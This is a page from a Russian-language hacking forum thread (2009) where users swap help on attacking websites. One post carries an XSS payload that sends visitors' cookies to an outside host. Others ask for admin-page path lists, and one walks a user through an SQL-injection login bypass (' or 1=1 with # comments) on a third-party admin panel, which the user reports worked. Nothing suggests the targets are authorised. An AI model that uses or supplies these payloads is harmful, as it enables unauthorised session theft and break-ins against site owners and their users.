FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 849 из 2422

849

Опции темы

Поиск в этой теме

Опции просмотра

19.08.2009, 16:27

~~+casper+~~

Banned

Регистрация: 27.06.2009

Сообщений: 200

Провел на форуме:
944465

Репутация: 68

Отправить сообщение для +casper+ с помощью ICQ

Привет всем. Вопрос: Нашол активную xss, НО фильт обрезает все ссылки. То есть <script>alert()</script> катит, всплывает окошко, а при попытке впихнуть снифер обрезает ссылку. Например, <a href="javascript:void win('page1.html')">page1</a> вот такой код обрезает до <a href="

Помогите, спасибо зарание!

19.08.2009, 16:31

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Отправить сообщение для it's my с помощью ICQ

Цитата:

Сообщение от +casper+

19.08.2009, 17:43

~~+casper+~~

Banned

Регистрация: 27.06.2009

Сообщений: 200

Провел на форуме:
944465

Репутация: 68

Некатит, может потому что xss во выдвигающемся меню, так только текс. А картинка наверное не грузится(
Вот в такой байде xss

Цитата:

<select name="poll_answer">
<option value="54033"><img src='h<script> img = new Image(); img.src = 'http://httpz.ru/123456.gif?'+document.cookie; </script></option>
</select>

Сам код на страницу попадает, но из-за тегов нет обращения к картинке(((

Последний раз редактировалось +casper+; 19.08.2009 в 18:11..

19.08.2009, 17:56

Saiga

Познающий

Регистрация: 22.07.2008

Сообщений: 49

Провел на форуме:
170912

Репутация: -4

Здраствуите

кто знает kak можно узнать где на сайте располагается Страничка для входа админа.

Если это простой перебор ( www.xxx.ru/admin, /login , /backend ...) то у кого нибудь есть список самых стандартных ?

спосиб..))

19.08.2009, 18:02

z00MAN

Постоянный

Регистрация: 20.11.2008

Сообщений: 406

Провел на форуме:
2358980

Репутация: 930

Цитата:

Сообщение от Saiga

http://forum.antichat.ru/thread40031.html

19.08.2009, 18:12

Inotsee

Новичок

Регистрация: 24.06.2009

Сообщений: 18

Провел на форуме:
536817

Репутация: 3

Драсьте.
Есть админка: http://www.site.com/admin/file.jsp, в админке 2 стандарт поля "логин" и "пасс". При подстановке в логин кавычки, выскакивает

PHP код:


		
			
 ERROR:  Syntax error or access violation, message from server: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and ad_pass=''' at line 1"

При вставке в пасс

PHP код:


		
			
 ERROR:  Syntax error or access violation, message from server: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1"

Есть ли возможность забраться в админку? И значит ли это, что там инъекция?
Заранее спасибо, и извиняюсь, если вопрос глупый.

19.08.2009, 18:15

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

попробуй в логин ' or 1=1/* пасс чо хочешь

19.08.2009, 18:20

Inotsee

Новичок

Регистрация: 24.06.2009

Сообщений: 18

Провел на форуме:
536817

Репутация: 3

Цитата:

Сообщение от it's my

попробуй в логин ' or 1=1/* пасс чо хочешь

Я тоже так сразу подумал. Походу фильтруется /*

PHP код:


		
			
 ERROR:  Syntax error or access violation, message from server: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' and ad_pass='qwerty'' at line 1"

19.08.2009, 18:33

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Цитата:

Сообщение от Inotsee

Я тоже так сразу подумал. Походу фильтруется /*

PHP код:


		
			
 ERROR:  Syntax error or access violation, message from server: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' and ad_pass='qwerty'' at line 1"

вместо /* попробуй -- или #

#10

19.08.2009, 19:15

Inotsee

Новичок

Регистрация: 24.06.2009

Сообщений: 18

Провел на форуме:
536817

Репутация: 3

Цитата:

Сообщение от it's my

вместо /* попробуй -- или #

спасибо братан, получилось. Прошло с #,

Страница 849 из 2422

849

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ